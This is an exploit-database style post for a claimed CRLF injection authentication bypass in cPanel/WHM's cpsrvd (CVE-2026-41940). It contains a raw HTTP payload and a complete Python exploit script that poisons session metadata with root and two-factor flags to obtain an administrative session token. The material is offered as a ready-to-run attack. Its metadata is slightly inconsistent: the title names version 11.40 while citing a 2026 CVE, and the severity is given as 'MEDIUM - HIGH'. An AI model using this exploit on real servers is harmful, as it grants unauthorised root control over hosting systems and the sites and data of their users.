# ExploitTitle: cPanel 11.40 - CRLF Injection # Author: nu11secur1tyAI # Date: 2026-04-30 # Vendor: cPanel, L.L.C. # Software: cPanel & WHM (cpsrvd) # Reference: CVE-2026-41940 / watchTowr-2026-01 ## Description: A critical authentication bypass vulnerability exists in the cPanel/WHM `cpsrvd` daemon due to improper neutralization of line delimiters (CRLF) in the `whostmgrsession` cookie and `Authorization` headers. An unauthenticated remote attacker can leverage this flaw to inject malicious session parameters directly into the server's flat-file session metadata store. By injecting sequences such as `user=root`, `hasroot=1`, and `tfa_verified=1`, the attacker subverts the internal authentication logic, forcing the system to issue a valid administrative session token (`/cpsessXXXXXXXXXX/`). This grants the attacker full `root` privileges over the WHM interface and the host operating system without requiring valid credentials. STATUS: MEDIUM - HIGH / Vulnerability [+] Payload: ```http GET / HTTP/1.1 Host: [TARGET_HOST]:2087 Authorization: Basic cm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x Cookie: whostmgrsession=[PREAUTH_SESSION_ID] Connection: close ``` [+] Exploit (Python): import argparse import re import requests import urllib.parse import urllib3 # Disable SSL warnings for cleaner output urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Crafted B64 payload: # root:x\r\nsuccessful_internal_auth_with_timestamp=9999999999\r\nuser=root\r\ntfa_verified=1\r\nhasroot=1 PAYLOAD_B64 = "cm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x" def exploit(target): s = requests.Session() s.verify = False print(f"[*] Initializing attack on {target}...") # Stage 1: Obtain pre-auth session base try: r = s.post(f"{target}/login/?login_only=1", data={"user": "root", "pass": "wrong_pass"}, allow_redirects=False, timeout=10) cookie = r.headers.get("Set-Cookie", "") match = re.search(r"whostmgrsession=([^;,]+)", cookie) if not match: print("[-] Error: Could not retrieve whostmgrsession cookie.") return session_base = urllib.parse.unquote(match.group(1)) print(f"[+] Obtained session base: {session_base}") # Stage 2: Poison session via CRLF Injection headers = { "Authorization": f"Basic {PAYLOAD_B64}", "Cookie": f"whostmgrsession={urllib.parse.quote(session_base)}", "Connection": "close" } r = s.get(f"{target}/", headers=headers, allow_redirects=False, timeout=10) # Stage 3: Extract leaked security token location = r.headers.get("Location", "") token_match = re.search(r"/cpsess\d{10}", location) if token_match: token = token_match.group(0) print(f"[!] EXPLOIT SUCCESSFUL!") print(f"[!] Leaked Token: {token}") print(f"[!] Access URL: {target}{token}/") else: print("[-] Exploit failed. The target may be patched or protected by a WAF.") except Exception as e: print(f"[-] Connection error: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="cPanel/WHM CVE-2026-41940 Exploit") parser.add_argument("--target", required=True, help="Target URL (e.g., [https://192.168.1.1:2087](https://192.168.1.1:2087))") args = parser.parse_args() exploit(args.target.rstrip("/")) ``` [+]Reproduce: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2026/CVE-2026-41940 Time spent: 03:45:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty https://www.asc3t1c-nu11secur1ty.com/ -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstorm.news/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty